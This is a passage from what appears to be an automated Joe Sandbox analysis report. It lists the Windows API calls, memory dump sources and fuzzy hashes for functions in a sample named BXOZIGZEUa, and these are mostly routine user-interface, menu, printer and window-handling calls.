                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Menu$CountItem$Remove
                                                              • String ID:
                                                              • API String ID: 3494307843-0
                                                              • Opcode ID: 2fff77f5dd29e52b897d3c390bf014bc2aa9c2a9d65e8cc2ed1d0d20a01c67d4
                                                              • Instruction ID: b6d5c103ad37182c8ee0d128ef9c77a8f31f800fdb221524a8a892247949b0fb
                                                              • Opcode Fuzzy Hash: 2fff77f5dd29e52b897d3c390bf014bc2aa9c2a9d65e8cc2ed1d0d20a01c67d4
                                                              • Instruction Fuzzy Hash: D1212F31900219FBCF019FA4DD54AAEBBB6FF44304F208453E901E2321D7B9AA61EF56
                                                              APIs
                                                              • GlobalLock.KERNEL32(?), ref: 004D93FB
                                                              • lstrcmpW.KERNEL32(00000000,?), ref: 004D9408
                                                              • OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 004D941A
                                                              • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004D943A
                                                              • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004D9442
                                                              • GlobalLock.KERNEL32(00000000), ref: 004D944C
                                                              • DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004D9459
                                                              • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004D9471
                                                                • Part of subcall function 004E0E5F: GlobalFlags.KERNEL32(?), ref: 004E0E6E
                                                                • Part of subcall function 004E0E5F: GlobalUnlock.KERNEL32(?), ref: 004E0E7F
                                                                • Part of subcall function 004E0E5F: GlobalFree.KERNEL32(?), ref: 004E0E89
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                              • String ID:
                                                              • API String ID: 168474834-0
                                                              • Opcode ID: 519162225c4f232b5209c029dac70f53a65aa0be07d24f76f745b9dda2992958
                                                              • Instruction ID: 52bab88d7a5eae75fd8077793995c8cebf844b8ac21fd73edad838076220d541
                                                              • Opcode Fuzzy Hash: 519162225c4f232b5209c029dac70f53a65aa0be07d24f76f745b9dda2992958
                                                              • Instruction Fuzzy Hash: 9F118C71500608BADB266FA6CC49D7F7FEEEBC4B40B00481AF655D2222DA39DD41E764
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000031), ref: 004DCD7E
                                                              • GetSystemMetrics.USER32(00000032), ref: 004DCD88
                                                              • SetRectEmpty.USER32(006431EC), ref: 004DCD97
                                                              • EnumDisplayMonitors.USER32(00000000,00000000,Function_0000CCE3,006431EC,?,?,0052D83D,?,?,?,004F72AE,?,?), ref: 004DCDA7
                                                              • SystemParametersInfoW.USER32(00000030,00000000,006431EC,00000000), ref: 004DCDC2
                                                              • SystemParametersInfoW.USER32(00001002,00000000,00643218,00000000), ref: 004DCDE2
                                                              • SystemParametersInfoW.USER32(00001012,00000000,0064321C,00000000), ref: 004DCDFA
                                                              • SystemParametersInfoW.USER32 ref: 004DCE1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
                                                              • String ID:
                                                              • API String ID: 2614369430-0
                                                              • Opcode ID: 4a9393496ebe78b8c8c02003d5bbf1a16ad7975735aa562b2dae8f22bd1e4906
                                                              • Instruction ID: 992bc105b5756de1f4e363c33d79efcf2de8eab7d66cfc5d52461723709a3ebd
                                                              • Opcode Fuzzy Hash: 4a9393496ebe78b8c8c02003d5bbf1a16ad7975735aa562b2dae8f22bd1e4906
                                                              • Instruction Fuzzy Hash: AB111C71541740AFE7319B668C89EE3BBFCFFDAB40F00081FE59A86240D7B56445CA60
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Global$Size$LockUnlock$Alloc
                                                              • String ID:
                                                              • API String ID: 2344174106-0
                                                              • Opcode ID: 41748890a08f6017e23485a269a6bf6c22dd4973cc547c410061200f3ff3a0be
                                                              • Instruction ID: 802cac69d05a652bf0591b341820e488a4d0f3095a7b8a0f743b824c1df68e66
                                                              • Opcode Fuzzy Hash: 41748890a08f6017e23485a269a6bf6c22dd4973cc547c410061200f3ff3a0be
                                                              • Instruction Fuzzy Hash: AF01BC71900218BFDB116F669C94C6FBF6CEF542A07008427FC0893321DA78DE20EAA4
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000B), ref: 004E520C
                                                              • GetSystemMetrics.USER32(0000000C), ref: 004E5213
                                                              • GetSystemMetrics.USER32(00000002), ref: 004E521A
                                                              • GetSystemMetrics.USER32(00000003), ref: 004E5224
                                                              • GetDC.USER32(00000000), ref: 004E522E
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 004E523F
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E5247
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 004E524F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1151147025-0
                                                              • Opcode ID: 282ed821d4fb00c8cb9d7508ba98035c1745344bbaa434681a9a52704fd15419
                                                              • Instruction ID: d62fec9cf3c5e5ef91d675694bc75c92300b531efb27b4c6f321b92f55200cd9
                                                              • Opcode Fuzzy Hash: 282ed821d4fb00c8cb9d7508ba98035c1745344bbaa434681a9a52704fd15419
                                                              • Instruction Fuzzy Hash: DEF06DB1E40724BAEB106B729C89F367F68FB50761F104416E604CB280CBB99815CFC0
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 005B4D8B
                                                              • DestroyIcon.USER32(?,00000004,0054EBC6,00000004,0054EE45,?,?,?), ref: 005B4DAE
                                                              • DestroyIcon.USER32(?,?,?), ref: 005B4DB6
                                                              • DestroyIcon.USER32(?,?,?), ref: 005B4DBE
                                                              • DestroyIcon.USER32(?,?,?), ref: 005B4DC6
                                                              • DestroyIcon.USER32(?,?,?), ref: 005B4DCE
                                                              • DestroyIcon.USER32(?,?,?), ref: 005B4DD6
                                                                • Part of subcall function 004DDC8F: __EH_prolog3_catch_GS.LIBCMT ref: 004DDC99
                                                                • Part of subcall function 004E0389: DeleteDC.GDI32(00000000), ref: 004E039B
                                                              • ~_Task_impl.LIBCPMT ref: 005B4E10
                                                                • Part of subcall function 0053F7DC: __EH_prolog3.LIBCMT ref: 0053F7E3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: DestroyIcon$H_prolog3$DeleteH_prolog3_catch_Task_impl
                                                              • String ID:
                                                              • API String ID: 3851967330-0
                                                              • Opcode ID: 3d68d22e7bc645af2768c3bd886c04fc0af56efc581363219e7a56ddfc23c569
                                                              • Instruction ID: 30d28ad108f96994ee02c3ff14126ff7630cf4d20ac4a55d722d9d57eb159a5d
                                                              • Opcode Fuzzy Hash: 3d68d22e7bc645af2768c3bd886c04fc0af56efc581363219e7a56ddfc23c569
                                                              • Instruction Fuzzy Hash: 5C015A34401784DFDB21BF71CD05BAEBEA2FF80304F11455DE5AA172A1CBB52A45DB02
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 0055A829
                                                              • GetMenuItemCount.USER32(0000000D), ref: 0055A872
                                                              • GetMenuItemID.USER32(0000000D,?), ref: 0055A895
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                                • Part of subcall function 0054ABE8: __EH_prolog3.LIBCMT ref: 0054ABEF
                                                                • Part of subcall function 004DCC4D: __EH_prolog3.LIBCMT ref: 004DCC54
                                                              • lstrlenW.KERNEL32(00000000,?), ref: 0055A9B7
                                                              • CharUpperBuffW.USER32(00000002,00000001), ref: 0055A9CC
                                                              • lstrlenW.KERNEL32(00000000), ref: 0055A9D4
                                                              • GetSubMenu.USER32(00000000,?), ref: 0055AB06
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Menu$Itemlstrlen$BuffCharCountException@8H_prolog3_ThrowUpper
                                                              • String ID:
                                                              • API String ID: 1336055891-0
                                                              • Opcode ID: 879cb5b4cc1af74aec67c9a7f54b6a019905de619809e19be810238da87a0d98
                                                              • Instruction ID: 93c37e68905a4b8ada5f14dabd52137e3cda9ac6262bd6f84ef080580dacbf87
                                                              • Opcode Fuzzy Hash: 879cb5b4cc1af74aec67c9a7f54b6a019905de619809e19be810238da87a0d98
                                                              • Instruction Fuzzy Hash: DBD17830904229ABCF25EB64CC69BEDBB74BF05325F1042DBE519A62D1DB345E88CF52
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Copy$Empty$CursorWindow
                                                              • String ID:
                                                              • API String ID: 3097416131-0
                                                              • Opcode ID: 9cd323fff117954cded28d4dbc2827463788751bdd7d7b0cf3a35a29c55e78be
                                                              • Instruction ID: 9f0fb5987ec422fe019c2e737603ff5d3d45de8e392b1fa82d2c662e13865478
                                                              • Opcode Fuzzy Hash: 9cd323fff117954cded28d4dbc2827463788751bdd7d7b0cf3a35a29c55e78be
                                                              • Instruction Fuzzy Hash: 7FC15D31A00609EFCF15DFA4C8A9AEEBBB5FF49305F10442AE815A7251EB71AD09CF50
                                                              APIs
                                                              • SetRectEmpty.USER32(006073F0), ref: 0050EF14
                                                              • GetKeyState.USER32(00000011), ref: 0050EF1C
                                                              • IsRectEmpty.USER32(?), ref: 0050EF79
                                                              • GetWindowRect.USER32(?,006073F0), ref: 0050F0F6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$Empty$StateWindow
                                                              • String ID: Dc$`c
                                                              • API String ID: 2684165152-1800285958
                                                              • Opcode ID: 24c13eaee5c79ca59899134e6616eb36850e397c7f406d6ccc2e1d8cbd78862d
                                                              • Instruction ID: c0b2b349f37d2cc21af52ee5f3519eb9432c8d368688f194b6e3bf233b3399ec
                                                              • Opcode Fuzzy Hash: 24c13eaee5c79ca59899134e6616eb36850e397c7f406d6ccc2e1d8cbd78862d
                                                              • Instruction Fuzzy Hash: 3B916031A00205DFDF15DFA4DC45BAEBBB6FF88310F14816AF905A7695CB35A940CBA4
                                                              APIs
                                                                • Part of subcall function 0054C96C: GetParent.USER32(?), ref: 0054C986
                                                              • OffsetRect.USER32(?,?,?), ref: 00554E4D
                                                              • GetCursorPos.USER32(?), ref: 00554E5D
                                                                • Part of subcall function 00551251: SetRectEmpty.USER32(?), ref: 0055125E
                                                                • Part of subcall function 00551251: GetWindowRect.USER32(?,?), ref: 0055126F
                                                                • Part of subcall function 0054C8BB: GetParent.USER32(00000000), ref: 0054C8C6
                                                                • Part of subcall function 0054C8BB: OffsetRect.USER32(?,00000000,?), ref: 0054C8FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$OffsetParent$CursorEmptyWindow
                                                              • String ID:
                                                              • API String ID: 633258892-0
                                                              • Opcode ID: 60a0efa55e3dc50babe2638a5e1d82729e964d3c539fe077c03cb933ac589d5e
                                                              • Instruction ID: 84594908cfe84ac3bc377182f1bb68d1aad58f57dee52cab33a1843e318f0b11
                                                              • Opcode Fuzzy Hash: 60a0efa55e3dc50babe2638a5e1d82729e964d3c539fe077c03cb933ac589d5e
                                                              • Instruction Fuzzy Hash: B9A1F971A0010AAFCF14DFA8D999AEEBBB6FF48305F14446AF905E7290DB319945CF60
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 00560EE5
                                                              • CreateCompatibleDC.GDI32(00000002), ref: 00560F42
                                                                • Part of subcall function 00543605: FillRect.USER32(?,00000020), ref: 00543619
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: CompatibleCreateFillH_prolog3Rect
                                                              • String ID:
                                                              • API String ID: 2215992850-0
                                                              • Opcode ID: 9aace8f7f67e7fd54165d52f5493faef96c5cd99cb08e0e179ab8aea55c25e60
                                                              • Instruction ID: 78723b2d3a1637112a14180a853a9de33254e0a22731bef9f15218b5cb52b5fd
                                                              • Opcode Fuzzy Hash: 9aace8f7f67e7fd54165d52f5493faef96c5cd99cb08e0e179ab8aea55c25e60
                                                              • Instruction Fuzzy Hash: 3F91A830A0061A9BCB14DFA9CD89ABEBFB5FF44300F04422AF961E7291DB74D954DB64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: _fgetc$_memcpy_s
                                                              • String ID: string too long
                                                              • API String ID: 160369518-2556327735
                                                              • Opcode ID: 16767058a65850e3bb4534122e4c6bfc44f8fccab5bd7bd3cbac2a44fc652e29
                                                              • Instruction ID: 55574f2d1c19c16605b064eeb3786c5ed4abafd5b4b95313ef75d662a93b3e38
                                                              • Opcode Fuzzy Hash: 16767058a65850e3bb4534122e4c6bfc44f8fccab5bd7bd3cbac2a44fc652e29
                                                              • Instruction Fuzzy Hash: B091A071E002199FCB14DFA8C8A09EEB7B1FF49311F50855BE42277780D779AA04CB95
                                                              APIs
                                                              • SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00527071
                                                              • IsWindow.USER32(?), ref: 00527238
                                                              • SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00527264
                                                              • GetParent.USER32(?), ref: 0052726D
                                                              • RedrawWindow.USER32(?,00000000,00000000,00000185,00000000), ref: 00527283
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$ParentRedraw
                                                              • String ID: 83`
                                                              • API String ID: 3493001960-1826646354
                                                              • Opcode ID: cd7662c3f1b05e0ce6dae46bb43381400dbe1ba3550591d1bd44da7a10b0d794
                                                              • Instruction ID: 72e517c4228cf61a35d0a071b99edb7c8d5d720ddfd31a7f33ab3e471ef846ae
                                                              • Opcode Fuzzy Hash: cd7662c3f1b05e0ce6dae46bb43381400dbe1ba3550591d1bd44da7a10b0d794
                                                              • Instruction Fuzzy Hash: A5718B34B04226EFDB24DF65D888AAE7BE5FF09304F14457AE54ADB2A1DB319D40CB90
                                                              APIs
                                                              • LockWindowUpdate.USER32(?), ref: 0053C47E
                                                              • IsWindow.USER32(?), ref: 0053C4A4
                                                              • GetWindowRect.USER32(?,?), ref: 0053C4FF
                                                              • CopyRect.USER32(?,?), ref: 0053C62E
                                                              • LockWindowUpdate.USER32(00000000,?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 0053C653
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$LockRectUpdate$Copy
                                                              • String ID: c
                                                              • API String ID: 2992910783-2927717585
                                                              • Opcode ID: 3c6af67bb63dc9efbde7581eddda23b5f198f0f511fa0ee8fd52d5c7cc3023e2
                                                              • Instruction ID: e6b3d80f4539b06e0ce813c3cbbc6a82170180b273dde5e2848132e15a30a81c
                                                              • Opcode Fuzzy Hash: 3c6af67bb63dc9efbde7581eddda23b5f198f0f511fa0ee8fd52d5c7cc3023e2
                                                              • Instruction Fuzzy Hash: 1A71E574A00218AFCB15DFA9C898DAEBBF9FF89700F14446AF846E7251DB346941CF60
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005B364D
                                                              • GetClientRect.USER32(00000000,?), ref: 005B3686
                                                              • GetSystemMetrics.USER32(00000002), ref: 005B3698
                                                              • InflateRect.USER32(00000000,000000FC,000000FB), ref: 005B36AE
                                                                • Part of subcall function 004E03A2: __EH_prolog3.LIBCMT ref: 004E03A9
                                                                • Part of subcall function 004E03A2: GetDC.USER32(00000000), ref: 004E03D5
                                                              • GetClientRect.USER32(00000000,?), ref: 005B373B
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 005B3749
                                                              • GetSystemMetrics.USER32(00000002), ref: 005B3751
                                                              Memory Dump Source
